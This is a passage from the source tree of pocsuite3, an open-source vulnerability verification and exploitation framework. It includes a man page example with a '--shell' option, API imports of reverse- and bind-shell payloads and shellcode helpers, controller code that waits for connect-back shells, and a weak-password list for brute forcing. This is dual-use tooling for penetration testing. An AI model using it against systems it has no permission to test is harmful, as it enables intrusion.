shell.\n.PP\n.br\n\\fI% pocsuite -r poc_example.py -u http://example.com/ --shell\\fR\n.PP\n.br\nUsing multiple threads, the default number of threads is 150.\n.PP\n.br\n\\fI% pocsuite -r poc_example.py -u http://example.com/ --verify --threads 20\\fR\n.PP\n.br\nScan multiple targets given in a textual file.\n.PP\n.br\n\\fI% pocsuite -r poc_example.py -f url.txt --verify\\fR\n.PP\n.br\n.SH \"SEE ALSO\"\nThe full documentation for\n.B pocsuite3\nis maintained at:\n.br\n.I https://pocsuite.org\n.PP\n.SH VERSION\nThis manual page documents pocsuite3 version 2.0.5\n.SH AUTHOR\n.br\n(c) 2014-present by Knownsec 404 Team\n.br\n<404-team@knownsec.com>\n.LP\nThis program is free software; you may redistribute and/or modify it under\nthe terms of the GNU General Public License as published by the Free\nSoftware Foundation; Version 2 with the clarifications and\nexceptions described below. This guarantees your right to use, modify, and\nredistribute this software under certain conditions. If you wish to embed\npocsuite3 technology into proprietary software, we sell alternative licenses\n(contact 404-team@knownsec.com).\n.PP\nManual page started by 13ph03nix\n\n.PP\n\n" }, { "path": "pocsuite3/__init__.py", "content": "__title__ = 'pocsuite3'\n__version__ = '2.1.0'\n__author__ = 'Knownsec 404 Team'\n__author_email__ = '404-team@knownsec.com'\n__license__ = 'GPLv2'\n__copyright__ = 'Copyright 2014-present Knownsec 404 Team'\n__name__ = 'pocsuite3'\n__package__ = 'pocsuite3'\n\nfrom .lib.core.common import set_paths\nfrom .cli import module_path\n\n\nset_paths(module_path())\n" }, { "path": "pocsuite3/api/__init__.py", "content": "import base64\nimport binascii\nimport collections\nimport json\nimport os\nimport re\nimport socket\nimport ssl\nimport struct\nimport textwrap\nimport time\nimport urllib\nimport zlib\n\nfrom pocsuite3.lib.controller.controller import start\nfrom pocsuite3.lib.core.common import (OrderedDict, OrderedSet, check_port,\n encoder_bash_payload,\n encoder_powershell_payload, get_host_ip,\n get_host_ipv6, mosaic,\n single_time_warn_message, urlparse)\nfrom pocsuite3.lib.core.data import conf, kb, logger, paths\nfrom pocsuite3.lib.core.datatype import AttribDict\nfrom pocsuite3.lib.core.enums import PLUGIN_TYPE, POC_CATEGORY, VUL_TYPE\nfrom pocsuite3.lib.core.interpreter_option import (OptBool, OptDict, OptFloat,\n OptInteger, OptIP, OptItems,\n OptPort, OptString)\nfrom pocsuite3.lib.core.option import init, init_options\nfrom pocsuite3.lib.core.plugin import PluginBase, register_plugin\nfrom pocsuite3.lib.core.poc import Output, POCBase\nfrom pocsuite3.lib.core.register import (load_file_to_module,\n load_string_to_module, register_poc)\nfrom pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT\nfrom pocsuite3.lib.request import requests\nfrom pocsuite3.lib.utils import (generate_shellcode_list, get_middle_text,\n minimum_version_required, random_str)\nfrom pocsuite3.lib.yaml.nuclei import Nuclei\nfrom pocsuite3.modules.censys import Censys\nfrom pocsuite3.modules.ceye import CEye\nfrom pocsuite3.modules.fofa import Fofa\nfrom pocsuite3.modules.httpserver import PHTTPServer\nfrom pocsuite3.modules.hunter import Hunter\nfrom pocsuite3.modules.interactsh import Interactsh\nfrom pocsuite3.modules.listener import (BIND_PAYLOAD, REVERSE_PAYLOAD,\n bind_shell, bind_tcp_shell,\n bind_telnet_shell)\nfrom pocsuite3.modules.quake import Quake\nfrom pocsuite3.modules.seebug import Seebug\nfrom pocsuite3.modules.shodan import Shodan\nfrom pocsuite3.modules.spider import crawl\nfrom pocsuite3.modules.zoomeye import ZoomEye\nfrom pocsuite3.shellcodes import OSShellcodes, WebShell\n\n\ndef get_listener_ip():\n return conf.connect_back_host\n\n\ndef get_listener_port():\n return conf.connect_back_port\n\n\ndef get_current_poc_obj():\n pass\n\n\ndef get_poc_options(poc_obj=None):\n poc_obj = poc_obj or kb.current_poc\n return poc_obj.get_options()\n\n\ndef get_results():\n return kb.results\n\n\ndef init_pocsuite(options={}):\n init_options(options)\n init()\n\n\ndef start_pocsuite():\n start()\n" }, { "path": "pocsuite3/cli.py", "content": "import os\nimport sys\nimport threading\nimport time\nimport traceback\n\ntry:\n import pocsuite3\nexcept ImportError:\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom pocsuite3.lib.core.option import init\nfrom pocsuite3.lib.core.option import init_options\nfrom pocsuite3.lib.core.exception import PocsuiteUserQuitException, PocsuiteSystemException\nfrom pocsuite3.lib.core.exception import PocsuiteShellQuitException\nfrom pocsuite3.lib.core.common import set_paths\nfrom pocsuite3.lib.core.common import banner\nfrom pocsuite3.lib.core.common import data_to_stdout\nfrom pocsuite3.lib.core.data import logger\nfrom pocsuite3.lib.parse.cmd import cmd_line_parser\nfrom pocsuite3.lib.controller.controller import start\n\n\ndef module_path():\n \"\"\"\n This will get us the program's directory\n \"\"\"\n return os.path.dirname(os.path.realpath(__file__))\n\n\ndef check_environment():\n try:\n os.path.isdir(module_path())\n except Exception:\n err_msg = \"your system does not properly handle non-ASCII paths. \"\n err_msg += \"Please move the pocsuite's directory to the other location\"\n logger.critical(err_msg)\n raise SystemExit\n\n\ndef main():\n \"\"\"\n @function Main function of pocsuite when running from command line.\n \"\"\"\n try:\n check_environment()\n set_paths(module_path())\n banner()\n\n init_options(cmd_line_parser().__dict__)\n\n data_to_stdout(\"[*] starting at {0}\\n\\n\".format(time.strftime(\"%X\")))\n init()\n try:\n start()\n except threading.ThreadError:\n raise\n\n except PocsuiteUserQuitException:\n pass\n\n except PocsuiteShellQuitException:\n pass\n\n except PocsuiteSystemException:\n pass\n\n except KeyboardInterrupt:\n pass\n\n except EOFError:\n pass\n\n except SystemExit:\n pass\n\n except Exception:\n exc_msg = traceback.format_exc()\n data_to_stdout(exc_msg)\n raise SystemExit\n\n finally:\n data_to_stdout(\"\\n[*] shutting down at {0}\\n\\n\".format(time.strftime(\"%X\")))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "pocsuite3/console.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/25 morning 10:49\n# @Author : chenghs\n# @File : console.py\nimport os\nimport sys\n\ntry:\n import pocsuite3\nexcept ImportError:\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nfrom pocsuite3.cli import check_environment, module_path\nfrom pocsuite3 import set_paths\nfrom pocsuite3.lib.core.interpreter import PocsuiteInterpreter\nfrom pocsuite3.lib.core.option import init_options\n\n\ndef main():\n check_environment()\n set_paths(module_path())\n init_options()\n poc = PocsuiteInterpreter()\n poc.start()\n\n\nif __name__ == '__main__':\n main()\n" }, { "path": "pocsuite3/data/password-top100.txt", "content": "admin\nadmin12\nadmin888\nadmin8\nadmin123\nsysadmin\nadminxxx\nadminx\n6kadmin\nbase\nfeitium\nadmins\nroot\nroots\ntest\ntest1\ntest123\ntest2\npassword\naaaAAA111\n888888\n88888888\n000000\n00000000\n111111\n11111111\naaaaaa\naaaaaaaa\n135246\n135246789\n123456\n654321\n12345\n54321\n123456789\n1234567890\n0\n123qwe\n123qweasd\nqweasd\n123asd\nqwezxc\nqazxsw\nqazwsx\nqazwsxedc\n1qaz2wsx\nzxcvbn\nasdfgh\nqwerty\nqazxdr\nqwaszx\n111111\n123123\n123321\nabcdef\nabcdefg\n!@#$%^\n!@#$%\n~!@#$%\n%$#@!\n^%$#@~!\n88888\n55555\naaaaa\nasd123\nqweasdzxc\nzxcvb\nasdfg\nqwert\n1\n2\n3\n4\n5\nqwe\nqwer\nwelcome\n!@#123\n111\n12\n123\n123!@#\n123654\n123654789\n123654789!\n123go\n1314520\n133135136\n13572468\n19880118\n1992724\n20080808\n3452510\n360\n360sb\n376186027\n3est\n45189946\n4816535\n4lert" }, { "path": "pocsuite3/lib/__init__.py", "content": "" }, { "path": "pocsuite3/lib/controller/__init__.py", "content": "" }, { "path": "pocsuite3/lib/controller/controller.py", "content": "import copy\nimport time\n\nimport requests\nfrom prettytable import PrettyTable\nfrom pocsuite3.lib.core.common import data_to_stdout, mosaic\nfrom pocsuite3.lib.core.data import conf, cmd_line_options\nfrom pocsuite3.lib.core.data import kb\nfrom pocsuite3.lib.core.data import logger\nfrom pocsuite3.lib.core.datatype import AttribDict\nfrom pocsuite3.lib.core.exception import PocsuiteValidationException, PocsuiteSystemException\nfrom pocsuite3.lib.core.poc import Output\nfrom pocsuite3.lib.core.settings import CMD_PARSE_WHITELIST\nfrom pocsuite3.lib.core.threads import run_threads\nfrom pocsuite3.lib.utils import urlparse\nfrom pocsuite3.modules.listener import handle_listener_connection\nfrom pocsuite3.modules.listener.reverse_tcp import handle_listener_connection_for_console\n\n\ndef runtime_check():\n if not kb.registered_pocs:\n msg = \"No poc specified, try 'pocsuite -h' or 'pocsuite --help' for more information\"\n logger.warn(msg)\n raise PocsuiteSystemException(msg)\n\n\ndef start():\n runtime_check()\n tasks_count = kb.task_queue.qsize()\n info_msg = \"pocsusite got a total of {0} tasks\".format(tasks_count)\n logger.info(info_msg)\n conf.threads = min(conf.threads, tasks_count)\n logger.debug(\"pocsuite will open {} threads\".format(conf.threads))\n\n try:\n run_threads(conf.threads, task_run)\n logger.info(\"Scan completed,ready to print\")\n finally:\n task_done()\n\n if conf.mode == \"shell\" and not conf.api:\n info_msg = \"connect back ip: {0} port: {1}\".format(mosaic(conf.connect_back_host), conf.connect_back_port)\n logger.info(info_msg)\n info_msg = \"watting for shell connect to pocsuite\"\n logger.info(info_msg)\n if conf.console_mode:\n handle_listener_connection_for_console()\n else:\n handle_listener_connection()\n\n\ndef show_task_result():\n if conf.quiet:\n return\n\n if not kb.results:\n return\n\n if conf.mode == \"shell\":\n return\n\n fields = [\"target-url\", \"poc-name\", \"poc-id\", \"component\", \"version\", \"status\"]\n if kb.comparison:\n fields.append(\"source\")\n fields.append(\"honey-pot\")\n results_table = PrettyTable(fields)\n results_table.align[\"target-url\"] = \"l\"\n results_table.padding_width = 1\n\n total_num, success_num = 0, 0\n for row in kb.results:\n data = [\n row.target,\n row.poc_name,\n row.vul_id,\n row.app_name,\n row.app_version,\n row.status,\n ]\n if kb.comparison:\n source, honey = kb.comparison.getinfo(row.target)\n data.append(source)\n data.append(honey)\n results_table.add_row(data)\n total_num += 1\n if row.status == 'success':\n success_num += 1\n\n data_to_stdout('\\n{0}'.format(results_table.get_string(sortby=\"status\", reversesort=False)))\n data_to_stdout(\"\\nsuccess : {} / {}\\n\".format(success_num, total_num))\n\n\ndef check_docker_status(target):\n if conf.docker_start:\n info_msg = \"wait for docker...\"\n logger.info(info_msg)\n while True:\n try:\n resp = requests.get(target)\n if resp.status_code:\n break\n except Exception:\n pass\n\n\ndef task_run():\n while not kb.task_queue.empty() and kb.thread_continue:\n target, poc_module = kb.task_queue.get()\n if not conf.console_mode:\n poc_module = copy.deepcopy(kb.registered_pocs[poc_module])\n poc_name = poc_module.name\n # check container status\n check_docker_status(target)\n\n if conf.pcap:\n # start capture flow\n import os\n import logging\n\n os.environ[\"MPLBACKEND\"] = \"Agg\"\n logging.getLogger(\"scapy\").setLevel(logging.ERROR)\n\n from pocsuite3.lib.utils.pcap_sniffer import Sniffer\n from scapy.utils import wrpcap\n sniffer = Sniffer(urlparse(target).hostname)\n if sniffer.use_pcap:\n if not sniffer.is_admin:\n logger.warn(\n \"Please use administrator privileges, and the poc will continue to execute \"\n \"without fetching the packet\")\n conf.pcap = False\n else:\n sniffer.start()\n # let scapy start for a while\n time.sleep(1)\n else:\n logger.warn(\"No libpcap is detected, and the poc will continue to execute without fetching the packet\")\n conf.pcap = False\n info_msg = \"running poc:'{0}' target '{1}'\".format(\n poc_name,\n mosaic(target)\n )\n\n if len(kb.targets) > 1:\n info_msg += \", {0} tasks waiting to be executed.\".format(kb.task_queue.qsize())\n\n logger.info(info_msg)\n\n # hand user define parameters\n if hasattr(poc_module, \"_options\"):\n for item in kb.cmd_line:\n value = cmd_line_options.get(item, \"\")\n if item in poc_module.options:\n poc_module.set_option(item, value)\n info_msg = \"Parameter {0} => {1}\".format(item, value)\n logger.info(info_msg)\n # check must be option\n for opt, v in poc_module.options.items():\n # check conflict in whitelist\n if opt in CMD_PARSE_WHITELIST:\n info_msg = (\n \"Poc:'{0}' You can't customize this variable '{1}' because it is already taken up \"\n \"by the pocsuite.\").format(poc_name, opt)\n logger.error(info_msg)\n raise SystemExit\n\n if v.require and v.value == \"\":\n info_msg = \"Poc:'{poc}' Option '{key}' must be set, please add parameters '--{key}'\".format(\n poc=poc_name, key=opt)\n logger.error(info_msg)\n raise SystemExit\n\n try:\n result = poc_module.execute(target, headers=conf.http_headers, mode=conf.mode, verbose=False)\n except PocsuiteValidationException as ex:\n info_msg = \"Poc:'{}' PocsuiteValidationException:{}\".format(poc_name, ex)\n logger.error(info_msg)\n result = None\n\n if not isinstance(result, Output) and not None:\n _result = Output(poc_module)\n if result:\n if isinstance(result, bool):\n _result.success({})\n elif isinstance(result, str):\n _result.success({\"Info\": result})\n elif isinstance(result, dict):\n _result.success(result)\n else:\n _result.success({\"Info\": repr(result)})\n else:\n _result.fail('target is not vulnerable')\n\n result = _result\n\n if not result:\n continue\n\n if not conf.quiet:\n result.show_result()\n\n result_status = \"success\" if result.is_success() else \"failed\"\n if result_status == \"success\" and kb.comparison:\n kb.comparison.change_success(target, True)\n\n output = AttribDict(result.to_dict())\n\n output.update({\n 'target': mosaic(target),\n 'poc_name': poc_name,\n 'created': time.strftime(\"%Y-%m-%d %X\", time.localtime()),\n 'status': result_status\n })\n result_plugins_handle(output)\n kb.results.append(output)\n if conf.pcap:\n sniffer.join(20)\n if not sniffer.is_alive():\n filename = urlparse(target).hostname + time.strftime('_%Y_%m_%d_%H%M%S.pcap')\n logger.info(f\"pcap data has been saved in: {mosaic(filename)}\")\n wrpcap(filename, sniffer.pcap.results)\n else:\n logger.error(\"Thread terminates timeout. Failed to save pcap\")\n\n # TODO\n # set task delay\n\n\ndef result_plugins_start():\n \"\"\"\n run result plugins, such as html report\n :return:\n \"\"\"\n for _, plugin in kb.plugins.results.items():\n plugin.start()\n\n\ndef result_plugins_handle(output):\n \"\"\"\n run result plugins when execute poc\n :return:\n \"\"\"\n for _, plugin in kb.plugins.results.items():\n plugin.handle(output)\n\n\ndef result_compare_handle():\n \"\"\"\n show comparing data from various of search engine\n :return:\n \"\"\"\n if not kb.comparison:\n return\n kb.comparison.output()\n\n\ndef task_done():\n show_task_result()\n result_plugins_start()\n result_compare_handle()\n" }, { "path": "pocsuite3/lib/core/__init__.py", "content": "" }, { "path": "pocsuite3/lib/core/clear.py", "content": "import logging\n\n\ndef remove_extra_log_message():\n logger_names = [\n \"paramiko\",\n \"paramiko.transport\",\n \"websockets\",\n\n ]\n\n for logger_name in logger_names:\n try:\n logging.getLogger(logger_name).disabled = True\n except Exception:\n pass\n" }, { "path": "pocsuite3/lib/core/common.py", "content": "# pylint: disable=E1101\nimport base64\nimport hashlib\nimport inspect\nimport logging\nimport os\nimport re\nimport select\nimport shlex\nimport socket\nimport struct\nimport subprocess\nimport sys\nimport time\nimport collections\nimport chardet\nimport requests\nimport urllib\nfrom collections import OrderedDict\nfrom functools import wraps\nfrom ipaddress import ip_address, ip_network\nfrom platform import machine\nfrom subprocess import call, Popen, PIPE\nfrom colorama.initialise import init as coloramainit\nfrom termcolor import colored\nfrom pocsuite3.lib.core.convert import stdout_encode\nfrom pocsuite3.lib.core.data import conf\nfrom pocsuite3.lib.core.data import kb\nfrom pocsuite3.lib.core.data import logger\nfrom pocsuite3.lib.core.data import paths\nfrom pocsuite3.lib.core.decorators import cachedmethod\nfrom pocsuite3.lib.core.enums import OS_ARCH, OS\nfrom pocsuite3.lib.core.exception import PocsuiteSystemException\nfrom pocsuite3.lib.core.log import LOGGER_HANDLER\nfrom pocsuite3.lib.core.settings import (\n BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,\n IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)\nfrom pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX\nfrom pocsuite3.lib.core.settings import IP_ADDRESS_REGEX\nfrom pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER\nfrom pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER\nfrom pocsuite3.lib.core.settings import POC_REQUIRES_REGEX\nfrom pocsuite3.lib.core.settings import UNICODE_ENCODING\nfrom pocsuite3.lib.core.settings import URL_ADDRESS_REGEX\n\n\ntry:\n collectionsAbc = collections.abc\nexcept AttributeError:\n collectionsAbc = collections\n\n\ndef urlparse(address):\n # https://stackoverflow.com/questions/50499273/urlparse-fails-with-simple-url\n try:\n ip = ip_address(address)\n if ip.version == 4:\n return urllib.parse.urlparse(f'tcp://{address}')\n elif ip.version == 6:\n return urllib.parse.urlparse(f'tcp://[{address}]')\n except ValueError:\n pass\n\n if not re.search(r'^[A-Za-z0-9+.\\-]+://', address):\n address = f'tcp://{address}'\n return urllib.parse.urlparse(address)\n\n\ndef read_binary(filename):\n content = ''\n with open(filename, 'rb') as f:\n content = f.read()\n return content\n\n\ndef check_path(path):\n return True if path and os.path.exists(path) else False\n\n\ndef check_file(filename):\n \"\"\"\n @function Checks for file existence and readability\n \"\"\"\n\n valid = True\n\n if filename is None or not os.path.isfile(filename):\n valid = False\n\n if valid:\n try:\n with open(filename, \"rb\"):\n pass\n except Exception:\n valid = False\n\n if not valid:\n raise PocsuiteSystemException(\"unable to read file '%s'\" % filename)\n return valid\n\n\ndef set_paths(root_path):\n \"\"\"\n Sets absolute paths for project directories and files\n \"\"\"\n paths.POCSUITE_ROOT_PATH = root_path\n paths.POCSUITE_DATA_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, \"data\")\n paths.POCSUITE_PLUGINS_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, \"plugins\")\n paths.POCSUITE_POCS_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, \"pocs\")\n paths.USER_POCS_PATH = None\n\n paths.WEAK_PASS = os.path.join(paths.POCSUITE_DATA_PATH, \"password-top100.txt\")\n\n paths.POCSUITE_HOME_PATH = os.path.expanduser(\"~\")\n _ = os.path.join(paths.POCSUITE_HOME_PATH, \".pocsuite\")\n\n paths.API_SHELL_HISTORY = os.path.join(_, \"api.hst\")\n paths.OS_SHELL_HISTORY = os.path.join(_, \"os.hst\")\n paths.SQL_SHELL_HISTORY = os.path.join(_, \"sql.hst\")\n paths.POCSUITE_SHELL_HISTORY = os.path.join(_, \"pocsuite.hst\")\n paths.POCSUITE_CONSOLE_HISTORY = os.path.join(_, \"console.hst\")\n\n paths.POCSUITE_TMP_PATH = os.path.join(_, \"tmp\")\n paths.POCSUITE_RC_PATH = os.path.join(paths.POCSUITE_HOME_PATH, \".pocsuiterc\")\n paths.POCSUITE_OUTPUT_PATH = paths.get(\"POCSUITE_OUTPUT_PATH\", os.path.join(_, \"output\"))\n paths.SHELLCODES_DEV_PATH = os.path.join(paths.POCSUITE_TMP_PATH, \"tools\")\n\n\ndef banner():\n \"\"\"\n Function prints pocsuite banner with its version\n \"\"\"\n _ = BANNER\n # if not getattr(LOGGER_HANDLER, \"is_tty\", False):\n # _ = clear_colors(_)\n if IS_WIN:\n coloramainit()\n\n data_to_stdout(_)\n\n\ndef set_color(message, bold=False):\n if isinstance(message, bytes):\n message = message.decode(UNICODE_ENCODING)\n ret = message\n\n if message and getattr(LOGGER_HANDLER, \"is_tty\", False): # colorizing handler\n if bold:\n ret = colored(message, color=None, on_color=None, attrs=(\"bold\",))\n\n return ret\n\n\ndef clear_colors(message):\n ret = message\n if message:\n ret = re.sub(r\"\\x1b\\[[\\d;]+m\", \"\", message)\n return ret\n\n\ndef boldify_message(message):\n ret = message\n if any(_ in message for _ in BOLD_PATTERNS):\n ret = set_color(message, bold=True)\n\n return ret\n\n\ndef data_to_stdout(data, bold=False):\n \"\"\"\n Writes text to the stdout (console) stream\n \"\"\"\n if not conf.get('quiet', False):\n message = \"\"\n\n if isinstance(data, str):\n message = stdout_encode(data)\n else:\n message = data\n\n sys.stdout.write(set_color(message, bold))\n\n try:\n sys.stdout.flush()\n except IOError:\n pass\n return\n\n\n@cachedmethod\ndef extract_regex_result(regex, content, flags=0):\n \"\"\"\n Returns 'result' group value from a possible match with regex on a given\n content\n >>> extract_regex_result(r'a(?P[^g]+)g', 'abcdefg')\n 'bcdef'\n \"\"\"\n\n ret = None\n\n if regex and content and \"?P\" in regex:\n match = re.search(regex, content, flags)\n\n if match:\n ret = match.group(\"result\")\n\n return ret\n\n\ndef get_latest_revision():\n \"\"\"\n Retrieves latest revision from the offical repository\n \"\"\"\n\n ret = None\n resp = requests.get(url=\"https://raw.githubusercontent.com/knownsec/pocsuite3/master/pocsuite3/__init__.py\")\n try:\n content = resp.content\n ret = extract_regex_result(r\"__version__\\s*=\\s*[\\\"'](?P[\\d.]+)\", content)\n except Exception:\n pass\n\n return ret\n\n\ndef poll_process(process, suppress_errors=False):\n \"\"\"\n Checks for process status (prints . if still running)\n \"\"\"\n\n while True:\n data_to_stdout(\".\")\n time.sleep(1)\n\n return_code = process.poll()\n\n if return_code is not None:\n if not suppress_errors:\n if return_code == 0:\n data_to_stdout(\" done\\n\")\n elif return_code < 0:\n data_to_stdout(\" process terminated by signal {}\\n\".format(return_code))\n elif return_code > 0:\n data_to_stdout(\" quit unexpectedly with return code {}\\n\".format(return_code))\n\n break\n\n\ndef parse_target_url(url):\n \"\"\"\n Parse target URL\n \"\"\"\n try:\n pr = urlparse(url)\n if pr.scheme.lower() not in ['http', 'https', 'ws', 'wss']:\n url = pr._replace(scheme='https' if str(pr.port).endswith('443') else 'http').geturl()\n except ValueError:\n pass\n\n return url\n\n\ndef is_url_format(value):\n if value and re.match(URL_ADDRESS_REGEX, value):\n return True\n else:\n return False\n\n\ndef is_domain_format(value):\n if value and re.match(URL_DOMAIN_REGEX, value):\n return True\n else:\n return False\n\n\ndef is_ip_address_format(value):\n if value and re.match(IP_ADDRESS_REGEX, value):\n return True\n else:\n return False\n\n\ndef is_ip_address_with_port_format(value):\n if value and re.match(IP_ADDRESS_WITH_PORT_REGEX, value):\n return True\n else:\n return False\n\n\ndef is_ipv6_address_format(value):\n if value and re.match(IPV6_ADDRESS_REGEX, value):\n return True\n else:\n return False\n\n\ndef is_ipv6_url_format(value):\n if value and re.match(IPV6_URL_REGEX, value):\n return True\n else:\n return False\n\n\ndef is_old_version_poc(poc_string):\n for _ in OLD_VERSION_CHARACTER:\n if _ in poc_string:\n return True\n return False\n\n\ndef is_pocsuite_poc(poc_string):\n for _ in POCSUITE_VERSION_CHARACTER:\n if _ in poc_string:\n return True\n return False\n\n\ndef is_pocsuite3_poc(poc_string):\n return True if \"pocsuite3\" in poc_string else False\n\n\ndef multiple_replace(text, adict):\n rx = re.compile(\"|\".join(map(re.escape, adict)))\n\n def get_replace(match):\n return adict[match.group(0)]\n\n return rx.sub(get_replace, text)\n\n\ndef get_filename(filepath, with_ext=True):\n base_name = os.path.basename(filepath)\n return base_name if with_ext else os.path.splitext(base_name)[0]\n\n\ndef get_md5(value):\n if isinstance(value, str):\n value = value.encode(encoding='UTF-8')\n return hashlib.md5(value).hexdigest()\n\n\ndef extract_cookies(cookie):\n cookies = dict([i.split(\"=\", 1) for i in cookie.split(\"; \")])\n return cookies\n\n\ndef get_file_items(filename, comment_prefix='#', unicode=True, lowercase=False, unique=False):\n ret = list() if not unique else OrderedDict()\n\n check_file(filename)\n\n try:\n with open(filename, 'rb') as f:\n for line in f.readlines():\n line = line.strip()\n if unicode:\n encoding = chardet.detect(line)['encoding'] or 'utf-8'\n line = line.decode(encoding)\n\n if comment_prefix and line.startswith(comment_prefix):\n continue\n\n if line:\n if lowercase:\n line = line.lower()\n\n if unique and line in ret:\n continue\n\n if unique:\n ret[line] = True\n\n else:\n ret.append(line)\n\n except (IOError, OSError, MemoryError) as ex:\n err_msg = \"something went wrong while trying \"\n err_msg += \"to read the content of file '{0}' ('{1}')\".format(filename, ex)\n raise PocsuiteSystemException(err_msg)\n\n return ret if not unique else ret.keys()\n\n\ndef parse_target(address, additional_ports=[], skip_target_port=False):\n # parse IPv4/IPv6 CIDR\n targets = OrderedSet()\n try:\n hosts = list(ip_network(address, strict=False).hosts())\n '''\n fix https://github.com/knownsec/pocsuite3/issues/319\n different python versions have different behaviors on ipaddress library\n '''\n try:\n t = ip_address(address.replace('/32', '').replace('/128', ''))\n if t not in hosts:\n hosts.append(t)\n except ValueError:\n pass\n\n for ip in hosts:\n\n if ip.version == 6:\n conf.ipv6 = True\n\n if not skip_target_port:\n targets.add(str(ip))\n\n for probe in additional_ports:\n probe = str(probe)\n # [proto:]port\n scheme, port = '', probe\n if len(probe.split(':')) == 2:\n scheme, port = probe.split(':')\n\n if scheme:\n targets.add(f'{scheme}://[{ip}]:{port}' if conf.get('ipv6', False) else f'{scheme}://{ip}:{port}')\n else:\n targets.add(f'[{ip}]:{port}' if conf.get('ipv6', False) else f'{ip}:{port}')\n\n return targets\n\n except ValueError:\n pass\n\n # URL\n try:\n if ip_address(urlparse(address).hostname).version == 6:\n conf.ipv6 = True\n except ValueError:\n pass\n\n if not skip_target_port:\n targets.add(address)\n\n try:\n pr = urlparse(address)\n for probe in additional_ports:\n probe = str(probe)\n # [proto:]port\n scheme, port = '', probe\n if len(probe.split(':')) == 2:\n scheme, port = probe.split(':')\n\n netloc = f'[{pr.hostname}]:{port}' if conf.get('ipv6', False) else f'{pr.hostname}:{port}'\n t = pr._replace(netloc=netloc)\n if scheme:\n t = t._replace(scheme=scheme)\n\n t = t.geturl()\n if t.startswith('tcp://'):\n t = t.lstrip('tcp://')\n targets.add(t)\n except ValueError:\n pass\n\n return targets\n\n\ndef parse_poc_docker_name(name):\n return name.lower().replace(' ', '_')\n\n\ndef single_time_log_message(message, level=logging.INFO, flag=None):\n if flag is None:\n flag = hash(message)\n\n if flag not in kb.single_log_flags:\n kb.single_log_flags.add(flag)\n logger.log(level, message)\n\n\ndef single_time_debug_message(message):\n single_time_log_message(message, logging.DEBUG)\n\n\ndef single_time_warn_message(message):\n single_time_log_message(message, logging.WARN)\n\n\n@cachedmethod\ndef get_public_type_members(type_, only_values=False):\n \"\"\"\n Useful for getting members from types (e.g. in enums)\n \"\"\"\n\n ret = []\n\n for name, value in inspect.getmembers(type_):\n if not name.startswith(\"__\"):\n if not only_values:\n ret.append((name, value))\n else:\n ret.append(value)\n\n return ret\n\n\ndef is_local_ip(ip_string):\n ret = False\n if ip_string and isinstance(ip_string, str) and re.match(LOCAL_IP_ADDRESS_REGEX, ip_string):\n ret = True\n return ret\n\n\ndef get_local_ip(all=True):\n \"\"\"Fetches all the local network address\n \"\"\"\n ips = OrderedSet()\n wan_ipv4 = get_host_ip(check_private=False)\n ips.add(wan_ipv4)\n if not all:\n return list(ips)\n\n wan_ipv6 = get_host_ipv6()\n if wan_ipv6:\n ips.add(wan_ipv6)\n\n # fix https://github.com/BVLC/caffe/issues/861\n os.environ[\"MPLBACKEND\"] = \"Agg\"\n\n # fix https://github.com/secdev/scapy/issues/3216\n logging.getLogger(\"scapy\").setLevel(logging.ERROR)\n\n from scapy.all import WINDOWS, get_if_list, get_if_addr\n\n if WINDOWS:\n from scapy.all import IFACES\n for iface in sorted(IFACES):\n dev = IFACES[iface]\n ips.add(dev.ip)\n else:\n for iface in get_if_list():\n ipv4 = get_if_addr(iface)\n if ipv4 != '0.0.0.0':\n ips.add(ipv4)\n\n return list(ips)\n\n\ndef get_host_ip(dst='8.8.8.8', check_private=True):\n \"\"\" Fetches source ipv4 address when connect to dst\n\n Args:\n dst : target ip or domain\n\n Returns:\n : source ip address\n \"\"\"\n\n # maybe docker env\n if dst == ['127.0.0.1', 'localhost']:\n dst = '8.8.8.8'\n\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((dst, 80))\n ip = s.getsockname()[0]\n except Exception:\n ip = '127.0.0.1'\n finally:\n s.close()\n\n if check_private and ip_address(ip).is_private:\n logger.warn(\n f'your wan ip {mosaic(ip)} is a private ip, '\n 'there may be some issues in the next stages of exploitation'\n )\n return ip\n\n\ndef has_poll():\n return hasattr(select, \"poll\")\n\n\ndef get_poc_requires(code):\n return extract_regex_result(POC_REQUIRES_REGEX, code)\n\n\ndef get_poc_name(code):\n if re.search(r'register_poc', code):\n return extract_regex_result(r\"\"\"(?sm)POCBase\\):.*?name\\s*=\\s*['\"](?P.*?)['\"]\"\"\", code)\n elif re.search(r'matchers:\\s*-', code):\n return extract_regex_result(r\"\"\"(?sm)\\s*name\\s*:\\s*(?P[^\\r\\n]*).*matchers:\"\"\", code)\n return ''\n\n\ndef is_os_64bit():\n return machine().endswith('64')\n\n\ndef write_file(data, file_ext='', file_name=''):\n \"\"\"\n Function to create file\n \"\"\"\n\n if not file_ext.startswith('.'):\n file_ext = '.' + file_ext\n if not file_name:\n file_name = TIMESTAMP\n file_name += file_ext\n file_path = os.path.join(paths.POCSUITE_TMP_PATH, file_name)\n\n fd = open(file_path, 'wb+')\n fd.write(data)\n fd.close()\n\n return file_path\n\n\ndef search_file(filename, search_path):\n \"\"\"\n Given a search path, find file\n \"\"\"\n path = os.path.join(search_path, filename)\n if os.path.exists(path):\n return path\n return None\n\n\ndef get_objective_code(asm_file, target_arch, debug=0):\n \"\"\"\n Get objective code (file: *.o)\n \"\"\"\n if target_arch == OS_ARCH.X86:\n output_format = 'elf'\n elif target_arch == OS_ARCH.X64:\n output_format = 'elf64'\n else:\n print(\"Format for output objective file is not defined\")\n return None\n\n if not asm_file:\n print(\"You must specify some params passed to function\")\n return None\n\n obj_file = (asm_file.split('.'))[0] + \".o\"\n\n app = 'nasm' # Application that do magic for us\n if 